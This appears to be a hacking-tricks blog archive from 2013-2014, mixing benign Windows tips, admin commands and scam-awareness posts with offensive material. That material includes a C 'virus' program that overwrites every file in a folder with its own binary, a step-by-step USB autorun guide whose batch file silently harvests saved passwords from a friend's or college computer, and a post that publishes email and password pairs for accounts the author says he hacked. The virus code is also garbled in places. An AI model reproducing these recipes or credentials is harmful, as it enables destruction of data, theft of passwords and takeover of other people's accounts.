Saturday, November 29, 2014

Download Youtube Videos Without Any Software

Today I Will Tell You Latest Youtube Hacking Tricks.....Please If You Like Our Tricks Then Like Our Facebook Page and share our tricks On Your Timeline This Is our Credit.....

 
First Step Open Youtube And Copy Video Url.. Like....
http://www.youtube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM

Second Step 
Cut  this address  http://www.

Third Step
Type--   SS
like
ssyoutube.com/watch?feature=player_detailpage&v=aYAOQGkE7AM


.....

Sunday, October 26, 2014

Wednesday, October 8, 2014

Access blocked website in college or school or net center-Proxy Server

In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server. 

What is Proxy?

Proxy server is some kind of a buffer between your computer and the designated internet destination. When you use a proxy server , your computer will send a request to the proxy server , then the proxy server will send it to the destination (for example a website), the destination will answer the request the proxy has sent and finally the proxy will return the data to you computer.



Reasons for using proxy servers:

  • Proxy server is able to increase or decrease the speed of your connection to the Internet depending on the location of the proxy
  • Proxy server ( but only anonymous) can hide your IP address (the resource you visit will retrieve the IP of the proxy, and not your
  • Proxy servers can help in case some owner of an Internet resource impose restrictions for users from certain countries ( for example hulu.com is only reserved for those from United States, if you are not from United States, you can’t watch videos on hulu.com)
How to Use:
open the proxy server site .
when you open the browser it will ask you to get the certificate.
so click "Get certificate "
and click "ok"
Now site will be opened
The website will ask you to enter the url of site.
enter url of site you want to visit .




List of Proxy Sites:

Pricacywanted.info

Netrover.info

Hidemyass.com
Launchwebs.org
Clear5.info
Bingbot.info
Calculatepie.com
Unicornpipe.com
truckflood.com
fly proxy
Fire-proxy

SIMPLE VIRUS CODING on C Language

Run this on your own responsibility*/


VIRUS CODE

/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)

write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

Hack Passwords Using a USB Device

 
 
 
  

   
 
 
Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer.
We need the following tools to create our rootkit. MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM. Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0 Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more… PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser
By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
 1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive. ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
 2. Create a new Notepad and write the following text into it [autorun]
open=launch.bat ACTION= Perform a Virus Scan save the Notepad and rename it from New Text Document.txt to autorun.inf Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it. start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files. This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer

How To Sniff Passwords Using USB Drive,How To Sniff Passwords Using USB Drive,HOW TO HACK PASSWORD USING USB DRIVE,Hack Passwords Using A Usb Device,Hack Password Using Usb Flash Drive ,How To Hack Passwords Using USB Drive,How To Hack Passwords Using A USB,How To Hack Saved Passwords Using USB,How To Hack Passwords Through USB Drive,How To Make An Auto-Hacking USB Drive,STEALLING PASSWORDS USING USB DRIVE.,Creating An Auto Hack USB Drive Using Autorun And Batch Files,How To Hack Passwords Using An USB Drive,How To Sniff Passwords Using USB Drive,Hack Passwords Using USB Flash Drive,How To Hack Passwords Using Usb Drive Softwares,Hack Passwords Using Pen Drive

How to Bypass Facebook Checkpoint Hack [Remove Security Questions]

How to Bypass Facebook Checkpoint Hack [Remove Security Questions]





How to Hack Facebook Checkpoint and get rigid of Facebook Security Questions. I got about 23 request on Topic "How to Break the Facebook Security Questions for easy Facebook Browsing" so I created this post. Friends I don't have any Facebook Account. To show this checkpoint problem I need a Account. So I Hacked some Account.


Account from Iran
eMail Address: shadykiller@hotmail.com
Password: 123456


Account from India [This account was hacked a different advanced method so i have to change the orginal password]
eMail Address: cyber_ninja@gmail.com
Password: 5555555





What is Facebook Checkpoint ?
It is New Facebook Security System. which helps facebook users from
hackers [bull shit. I hacked that Account shadykiller@hotmail.com]

When the Facebook Checkpoint is shown ?
When ever a Facebook user browsers Facebook from a different IP address than he usually does the facebook checkpoint is shown. Even if his web browser is changed facebook check point is shown I think this is stupid. Limited number of users have a Static IP Address.

For what the Facebook Security Questions are Shown?
If you login in to your Facebook Account from different Browser
If you login in to your Facebook Account from different Location
If you login in to your Facebook Account from different Computer
If you are trying to login from multiple Account

What Type of Security Questions are shown ?
Upload Photo ID [your goverment ID card must be uploaded to access facebook]
Identify the People tagged you [5 Photos]
Identify Friends Photo [5 Photos]
login from recent logged computers [you can't login from this computer]
Use your Mobile Number
Answer your security questions
Much More


I am using the above the above given eMail Address and Password to Login

Removing Identify the People Tagged you Checkpoint [eMail: shadykiller@hotmail.com]
  • This is shown because you logged in from different location or different computer or even different browser. If you are tagged by other. there is no option of other security questions
  • Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]






  • After you Click Start you should complete five photo tags



  • After you complete all this you can access your account. Most of them can't remember 3 month ago tags. Do you see the above screenshot of tags. the middle tagged photo. what is  it. whos photo is that. who tagged it. no one can identify photos like that
  • If your Account is Blocked like this and can't access. you can login in from your mobile version of facebook [m.facebook.com] in mobile version of facebook you birth dath is the security question. I f you know this login in to your account and access your photos and see who tagged you and then try to login from web version of facebook and give answer to your tags
  • To get remove this tag security checkpoint. Please tell your friends to not to tag you or change your settings for tag [You can only tag yourself in a photo]


Removing Identify Photos of Friend Checkpoint [eMail: cyber_ninja@gmail.com]
  • This is shown because you logged in from different location or different computer or even different browser. If you are tagged by other. there is option of other security questions
  • Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]
  • If you Make too many wrong answers this option will be removed and you will have only two security questions. your Mobile number and Security Questions. If you don't Have it or you have't added it. there is no help for you you account is blocked. Below is a screenshot of too many wrong answers
  • To remove this type of security questions don't add friends or before your account is blocked. try the above mentioned Mobile version trick of facebook


Identify Photo ID Card [Anonymous]
  • Your are think why i named this facebook id as anonymous because it was a ladies profile. i can't expose her personal details. sorry.
  • This is shown because There are other Profiles with you Identity. Matching your profile.  There is other option to recover
  • Below are the screenshot review of this Facebook Checkpoint [Click on the Screenshot to Zoom]




  • If you can't pass this. Try to login from the Facebook  Mentioned computer with the same browser. If you IP Address is change [not a static IP] you can't login in. your account is blocked permanently
  • To remove this type of security questions. try the above mentioned Mobile version trick of facebook. you can unlock this only if you know your date of birth. If you don't know this your account is blocked.

Beware Of Making Money Online On Scam Websites ..


There are so many fraudulent companies which are engaging peoples, those who are willing to make money online. Offering them easy jobs like Ad-posting, Form filling, Emails reading, Writing spam articles, Bogus surveys, etc. Later ask people to register on their website by paying a little registration fees (that little bucks make them rich). After all paying nothing after the job has been done, by arguing work has not been done in time or not properly.

Try to get advice from family members, friends, co-workers before involving in such an online jobs like "make money at home", "earn money without leaving home" & many more like these eye catching phrases. People often confused after visiting their stunning websites which includes Demo videos how would you do it & earn a lot of money without leaving home. Do some little research before applying and paying them on the search engine by finding about scams. It will give you the best idea to pay or not to pay.

Trying to get rich online is not an easy task but need special attention and focus. You need website to sell your products or services online. If you have a website then you need to know how to attract the visitor to raise traffic to your online business, website/store to get more sales.

How To Download APK Files Directly From Google Play?

Download APK Files
Usually, people get apps for their android device by downloading them from Google Play Store. The downloader gets the app installed for you, without bothering you with unnecessary details like the files required for installation etc. But what if you don’t have access to internet and you want an app installed on your phone? Surely you can’t do so without downloading stuff required for the installation. The solution to this problem is simple - just get the APK package of the desired app, and keep it beforehand for later when you need.
APK stands for Android Package. It’s actually a package which contains all the files necessary for installation. In other words, it’s a ‘standalone’ installer for your app which doesn’t require internet connectivity. You can get APK package of an android application from Google Play Store by simply adding an extension called ‘APK Downloader’ to your Google browser. Here we have a step by step procedure which will tell you how to add APK Downloader to your Google Chrome and subsequently, use it for getting APK packages
Once downloaded, the extension is to be added to your Google Chrome Extensions. To do so, follow these steps.
  • Go to the ‘Tools’ menu of your Chrome and select ‘Extensions’.
  • Locate the file you just downloaded (with extension ‘.crx’)
  • Now drag the file to your Extensions page.
  • For confirmation look for a small Play Store icon on your address bar
To configure the APK Downloader extension for your android device
  • Select the ‘options’ button on the menu
  • Enter the Gmail ID (the one required for Play Store)
  • Enter your password and device ID of your android device

For those of you who don’t know where to get device ID of your android device
  • Dial  “*#*#8255#*#*” from your android phone
If you are using an android tablet
  • Go to Google Play Store
  • Download ‘Device ID’
Device ID
Device ID will get your device ID for you.

Getting APK of an app is simple, just locate the app you want (on Play Store) and clicking on the APK icon on your address bar will get you your precious APK for that app. Another good thing about APK package is that it makes app sharing simple, now you can share an app with your friends by simply transferring the package to their device.
APK Icon
The APK and APK Downloader will make your life a lot easier if you face problems in installing your favorite apps due to connectivity issues or if you like to share your favorite apps with your friends.
Did you find this post useful? Did you have any problems? For any query, please ask in the comments section below.Let's enjoy...  :)

Fraudsters Shall Not Pass - Simple Advices On How To Avoid Scammers In Social Networks

Advices On  Avoiding Scammers In Social Networks

Social networks are always great for communicative people; they make you closer to your friends, relatives and hackers. Social networks are very attractive for such kind of people. You can ask me: “Why do they need that?” All they need is your account. The fraud schemes may be different. But the main aim of them is money. They can ask your relatives for help, especially when you’re far away. Why shouldn’t they believe their own child, when he needs money?

Fraudsters do not disdain playing on the heartstrings. They can write everything, that there’s an accident, you’re in a hospital, etc. So today we’ll study to confront fraudsters and keep our nerves and money safe.

Consequences

social media hacking scams
The most people don’t think about possible risks when creating their profile on social networks. The more personal and professional information you give, the easier it is for fraudsters to rob you. Let us discuss the easiest scheme. Some criminals are simply searching for people living in the same city to plunder their houses. Why does it happen? Different people are writing perfect information, like “We’re going to visit California next weekends. Hoping it’ll be great” Of course it will be great. For the robber, because now he knows that the house will be empty during weekends and it’s the perfect opportunity for him.
The second thing is the photos. When you’re downloading images and photos on social networks not only your friends like them. It’s also the perfect resource for burglars. From home-made photos, they can receive information about your welfare and house structure. When you have a dog, the robber will be prepared, because everyone has photos with their home pets. That’s why we earnestly advise you not to put in the Internet photos of your house, and some things that can attract robbers, for instance your new car or a brilliant ring.

Advice

The next our advice – create a complicated password. We’ve just discussed what fraudsters can do with the access to your account, so try to protect yourself, your friends, and relatives as good as you can. Don’t make a password consisting of just your birth date. Remember, that it’s the first combination fraudsters try. Also, don’t put your birth date as the answer to the test question if it’s mail. Check out below article on password cracking.
Let us imagine that you have a complicated password, you don’t download the “rob-attractive” photos and one day you receive the link from your friend where he asks you to vote for him. Stop now. This can be a trap. If you’ll link, the fraudsters receive your personal data, such as login and password. Such scheme is called “fishing”. So, in this case, ask your friend something personal. The other variant is just to make him a call and ask about this. If you’ll receive the answer like “What are you talking about?” you should explain him that he was hacked and offer to change the password. Check out below tutorial to know about popular hacking method used to acquire sensitive information about oneself.
Phones are really helpful things. Explain to your friends and relatives that you can be hacked and if they receive messages with money requests, they must call you at first and ask about that. Remember that your security is in your hands and be careful.

3 Basic Tips to Prevent A DDoS Attack

 DDoS Attack
Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!
Understanding DDOS Attack

 DDoS Attack bot
A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.
Let’s understand the basic idea! Now, the attacker notifies all the computers present on the botnet to keep in touch with a particular site or a web server, time and again. This increases traffic on the network that causes in slowing down the speed of a site for the intended users. Unfortunately, at times the traffic can be really high that could even lead to shutting a site completely.
3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.

1. Buy More Bandwidth.

 DDoS Attack bandwidth
One of the easiest methods is to ensure that you have sufficient bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the requests. How does it help? Well, distributed denial of service is a nothing more than a game of capacity. Let’s suppose you have 10,000 computer systems each distributing 1 Mbps directed towards your way. This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!
So to avoid such issue, you need to apply the same rule intended for normal redundancy. According to this technique, if you wish to have more web servers just multiply around diverse datacenters and next make use of load balancing. By spreading your traffic to various servers will help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.

2. Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider having the largest DDoS protection and mitigation network, automated tools, and a pool of talented anti-DDoS technicians with the wherewithal to take action in real-time as per the varying DDoS attack characteristics. A viable alternative is to utilize a DDoS prevention appliance, which is specifically intended to discover and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

 DDoS Attack
In case you have computer systems that are connected to the web directly, a better idea is to properly install/configure your routers and firewall so as to limit the connectivity. For an instance, while receiving some data from a client machine you can only allow traffic to pass from the machine only on a few chosen ports (like HTTP, POP, SMTP etc.) via the firewall.
Wrapping Up!


Websites are largely getting attacked by hackers every second. Denial-of-service attack is insanely getting huge and is creating a lot of problems for business organizations having strong online vicinity. In this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks. Aforementioned are three tips that I’ll recommend you to run through to at least understand where to get started towards building a resilient web network with chances of surviving a DDoS attack.

Computer Hacking in the New Age, All you Need to Know about Hacking Today

Every human discovery has pros and cons, so is the computer which has pervaded all our lives. The modern humanity is increasingly dependent on computer for various day-to-day activities. Computers do us a whole lot of good things, but it is not without some pitfalls. With the extensive use of internet for hundreds of our needs, computer opens a vicious cycle of hackers. Computer hacking is a term which refers to an individual’s illegal and unauthorized access to the data which are stored in a user’s system. This is done to disturb the confidentiality and security of the user’s computer.

The hackers focus on individuals’ computer system when they are online. As long as you are not connected to internet you are less prone to hacking. The access to internet has actually made computer hacking easy. You must protect your computer with strong antivirus and firewall programs to keep hackers away. Hackers are known for creating problems which are difficult to solve. This gives a good business to computer investigators and technicians. Hacking can be done in lots of ways. Few of them are given below:
  • Worms: These are the programs which propagate through networks.
  • Trojans: These are hidden in websites, attached files and emails.
  • Viruses: These attach themselves to various kinds of files. They can damage certain functions of your computer.
Hackers also crash on wireless networks which do not have firewall installed and enabled. They can also send email attachments with malicious software which get embedded on the victim’s computer. Hackers attack accounts which have weak passwords. All these are done to get access to confidential and sensitive information of the users. Whatever is the method of hacking, the effect is harmful for the user. Your system will be flooded with viruses, malwares which steal your information. In order to avoid hacking one has to make sure that the systems at home or office have the latest anti-virus program and firewall installed and enabled. These programs need to be regularly updated. Use the latest browser and scan your computer on a regular basis.

New Age...

The New Age of internet has brought with it many risk factors along with umpteen advantages. The New Age is the time where our personal lives are no longer very personal, but people are able to access personal information of internet users from various sources in the virtual world. We need to be careful about usernames and passwords, else it will lead to dangerous consequences. Universities, large companies and government agencies are mostly targeted by hackers simply because of the bulk of information they handle. The great newspapers like The Wall Street Journal and The New York Times were also targeted by hackers.

Computer hackers are people who gain remote access to information stored in a system elsewhere. During the 1950s and 60s hackers were more drawn towards learning the operations of a computer rather than stealing confidential information of a remote user. Unlike the olden days, now computer hacking has become more sophisticated and organized. In the late 1990s hackers tried to get access to files in the network of Pentagon. Some more expert hackers gained access to the patent files at the Indiana University School of Medicine in February 2003. Many hackers were sentenced in the history since hacking represents a potential national security threat.

Viruses

One major tool hackers use to steal information from computer systems is the use of viruses. Over the years the number of viruses has increased drastically. The virtual world now has above 100000 viruses and the number grows virtually every day. Apart from the threat the computer hackers pose, they also can be beneficial in one way. They can bring to light the flaws in a computer network. Hackers can help in redesigning the system and in making information inaccessible to illegal users and to unauthorized access.

Getting Administrative Access

Getting a log in password is one of the predominant ways to get access to a computer which is by the side of the hacker. Getting remote access to a computer is another way to hack a system. Managing to crack a Wi-Fi password is the third method of sneaking into someone else’s system. Hacking if done on a public or school computer will have serious consequences. The hacker will be put behind the bars for illegally accessing the computer which does not belong to him or her.

Friday, July 19, 2013

System Security For User........

             System Security For User........





1. Always use a strong password with a combination of alphabets, numbers and special characters

2. Use Original Antivirus. Dont download Cracks & Keygens which are the main entry point for Viruses and Trojans.

3. Use Original Windows OS ( Paid ) or Use Open source OS such as Linux, Ubuntu, Flavours of Linux. Do not use some programs to patch your system.

4. Regularly Update your Antivirus and OS to remove and/or patch vulnerabilities and keep your system secure.

5. Shutdown / Uninstall unwanted programs or programs which you dont use such as FTP, Telnet or any softwares which use your resource.

6. Use Drive Encryption tools to protect your data from data theft and to protect from data loss.

7. Always create a back-up of your important files to a Hard disk or Online Servers ( like Drop box )

8. Never trust any other network to which you connect( OPen WiFi ). Crackers & hackers can compromise your data and also steal your data transmitted .

9. Have a routine check of your computer for defects and patch immediately.

10. Never leave your computer unattended, even for a short time. It is easy for a cracker to inject a virus or spyware into your system.

                                        ENJOY.......

Saturday, July 6, 2013

TWEAK YOUR COMPUTER..


Registry Hacks to Tweak WindowsMicrosoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the Windows Registry so as to add more extra features and functionalities to their operating system.
If you’re one such geek who would like to customize Windows in your own way, here is a list of 8 interesting registry hacks that you need to try:

1. Disable USB Devices:

Disabling USB ports can be a smart idea to add security to the computer. This can be really handy if the computer is on a public place where the chances of virus and other malware infection is really high. You can easily disable access to USB ports with the following registry hack:
  1. Open the Registry Editor (Start -> Run -> Type regedit and hit Enter)
  2. In the registry, navigate to the following key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor
  3. In the right-side pane, double-click on “Start”.
  4. In the “Value data” field enter 4 and click on “OK”.
  5. Close the Registry Editor and reboot.
To enable USB devices, follow the same procedure as above except in the step-4 enter3 in the “Value data” field.
Works on Windows XP, Vista and 7.

2. Disable Notification Balloons in Windows 7 and Vista:

You can now disable the annoying notification balloons that keeps popping up frequently with warning messages and reminders. Here is a step-by-step procedure to do that:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  2. Right-click on the right-hand pane, and create a new “DWORD”.
  3. Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0. Reboot the computer to see the changes in effect.

3. Add “Recycle Bin” to My Computer in Windows 7 and Vista:

Would you like to add the “Recycle Bin” icon to My Computer so that you need not go back to the desktop to access it when required? Well, here is how you can do that:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\ NameSpace
  2. Right-click on “NameSpace” and select New -> Key. Name the key with the following name:
    {645FF040-5081-101B-9F08-00AA002F954E}
  3. Now, open “My Computer” and hit F5 to refresh the screen. This should show up the “Recycle Bin” icon.

4. Disable the Windows Task Manager:

Need to limit access to your computer by disabling the Task Manager? Here is a simple registry hack to do this:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
  2. Right-click on “Policies”, select New -> Key and name the key as System.
    If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to:HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\System in the Step-1 itself.
  3. Right-click on “System”, create a new “DWORD” and name it toDisableTaskMgr.
  4. Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1(0=Enable, 1=Disable).
  5. To enable the Task Manager, Set the “Value data” back to 0.
Works on Windows XP, Vista and 7.

5. Change the Registered Owner and Organization Name:

Here is a simple hack to change the name of the Registered owner on your computer:
  1. Open the Registry Editor and navigate to:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  2. On the right-side pane, find the keys RegisteredOwner andRegisteredOrganization. Double-click on them to change the names to whatever you want.
  3. To see the changes, right-click on “My Computer” and select “Properties”.
Works on Windows XP, Vista and 7.

6. Add Programs to Windows Startup:

You can now add your favorite programs to Windows Startup without the need for using the start-up folder. Here is a way to do this:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  2. On the right-side pane, create a new “String Value” and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter).
  3. Double-click on the “String Value”, in the “Value data” field add the path of the executable program that has to execute at startup.
  4. Reboot the computer to see the changes in effect.
Works on Windows XP, Vista and 7.

7. Add “Pin to Start Menu” Option for Folders in Windows 7 and Vista:

Ever wanted to pin a folder to the start menu to gain faster access to it? Well, it is possible to add the “Pin to Start Menu” option so that you can plug your favorite folders to Start Menu. Here is a step-by-step procedure:
  1. Open the Registry Editor and navigate to:
    HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers
  2. Right-click on “ContextMenuHandlers” and select New -> Key. Name the key as follows:
    {a2a9545d-a0c2-42b4-9708-a0b2badd77c8}
  3. Now, whenever you want to add a folder to Start Menu, hold down the Shiftkey and right-click on the folder. You should see the “Pin to Start Menu” option in the context menu”.

8. Disable “Aero Shake” in Windows 7:

One of the new additions to Windows 7 is the “Aero Shake” feature using which it is possible to grab a window using it’s title bar and shake it. This will minimize all the other open windows if any. It is really a handy feature! However, if you ever wanted to disable this feature, here is a solution:
  1. Open the Registry Editor and navigate to the following key:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows
  2. Now, right-click on “Windows” key and create a new Key called Explorer.
  3. Right-click on the “Explorer” key and create a new “DWORD” calledNoWindowMinimizingShortcuts and set it’s value to 1.
  4. Close the Registry Editor and reboot the computer to see the changes in effect.

How to Create Your Own Customized Run Commands

Create Customized Run commandsThe Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such asCommand prompt (cmd), Calculator (calc) etc.
So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command:

Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing ie in the Run dialog box. Here is how you can do that.
  1. Right-click on your Desktop and select New -> Shortcut.
  2. You will see a “Create Shortcut” Dialog box as shown below
    Create customized Run command
  3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
  4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie“. Click on “Finish”.
  5. You will see a shortcut named ie on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
  6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say ff for Firefox, ym for Yahoo messenger, wmp for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.

ENJOY>>>>>

Friday, July 5, 2013

WINDOWS 7 COMMANDS FOR ADMINISTRATOR.

1: System File Checker
Malicious software will often attempt to replace core system files with modified versions in an effort to take control of the system. The System File Checker can be used to verify the integrity of the Windows system files. If any of the files are found to be missing or corrupt, they will be replaced. You can run the System File Checker by using this command:

sfc /scannow

2: File Signature Verification
One way to verify the integrity of a system is to make sure that all the system files are digitally signed. You can accomplish this with the File Signature Verification tool. This tool is launched from the command line but uses a GUI interface. It will tell you which system files are signed and which aren’t. As a rule, all the system files should be digitally signed, although some hardware vendors don’t sign driver files. The command used to launch the File Signature Verification tool is:

sigverif

3: Driverquery

Incorrect device drivers can lead to any number of system problems. If you want to see which drivers are installed on a Windows 7 system, you can do so by running the driverquery tool. This simple command-line tool provides information about each driver that is being used. The command is:

driverquery

If you need a bit more information, you can append the -v switch. Another option is to append the -si switch, which causes the tool to display signature information for the drivers. Here’s how they look:

driverquery -v

driverquery -si

4: Nslookup

The nslookup tool can help you to verify that DNS name resolution is working correctly. When you run nslookup against a host name, the tool will show you how the name was resolved, as well as which DNS server was used during the lookup. This tool can be extremely helpful when troubleshooting problems related to legacy DNS records that still exist but that are no longer correct.

To use this tool, just enter the nslookup command, followed by the name of the host you want to resolve. For example:

nslookup dc1.contoso.com

5: Ping

Ping is probably the simplest of all diagnostic commands. It’s used to verify basic TCP/IP connectivity to a network host. To use it, simply enter the command, followed by the name or IP address of the host you want to test. For example:

ping 192.168.1.1

Keep in mind that this command will work only if Internet Control Message Protocol (ICMP) traffic is allowed to pass between the two machines. If at any point a firewall is blocking ICMP traffic, the ping will fail.

6: Pathping

Ping does a good job of telling you whether two machines can communicate with one another over TCP/IP, but if a ping does fail, you won’t receive any information regarding the nature of the failure. This is where the pathping utility comes in.

Pathping is designed for environments in which one or more routers exist between hosts. It sends a series of packets to each router that’s in the path to the destination host in an effort to determine whether the router is performing slowly or dropping packets. At its simplest, the syntax for pathping is identical to that of the ping command (although there are some optional switches you can use). The command looks like this:

pathping 192.168.1.1

7: Ipconfig

The ipconfig command is used to view or modify a computer’s IP addresses. For example, if you wanted to view a Windows 7 system’s full IP configuration, you could use the following command:

ipconfig /all

Assuming that the system has acquired its IP address from a DHCP server, you can use the ipconfig command to release and then renew the IP address. Doing so involves using the following commands:

ipconfig /release

ipconfig /renew

Another handy thing you can do with ipconfig is flush the DNS resolver cache. This can be helpful when a system is resolving DNS addresses incorrectly. You can flush the DNS cache by using this command:

ipconfig /flushdns

8: Repair-bde

If a drive that is encrypted with BitLocker has problems, you can sometimes recover the data using a utility called repair-bde. To use this command, you will need a destination drive to which the recovered data can be written, as well as your BitLocker recovery key or recovery password. The basic syntax for this command is:

repair-bde -rk | rp 
You must specify the source drive, the destination drive, and either the rk (recovery key) or the rp (recovery password) switch, along with the path to the recovery key or the recovery password. Here are two examples of how to use this utility:

repair-bde c: d: -rk e:\recovery.bek

repair-bde c: d: -rp 111111-111111-111111-111111-111111-111111


9: Tasklist

The tasklist command is designed to provide information about the tasks that are running on aWindows 7 system. At its most basic, you can enter the following command:

tasklist
The tasklist command has numerous optional switches, but there are a couple I want to mention. One is the -m switch, which causes tasklist to display all the DLL modules associated with a task. The other is the -svc switch, which lists the services that support each task. Here’s how they look:

tasklist -m

tasklist -svc

10: Taskkill

The taskkill command terminates a task, either by name (which is referred to as the image name) or by process ID. The syntax for this command is simple. You must follow the taskkill command with -pid (process ID) or -im (image name) and the name or process ID of the task that you want to terminate. Here are two examples of how this command works:

taskkill -pid 4104

taskkill -im iexplore.exe


ENJOY..........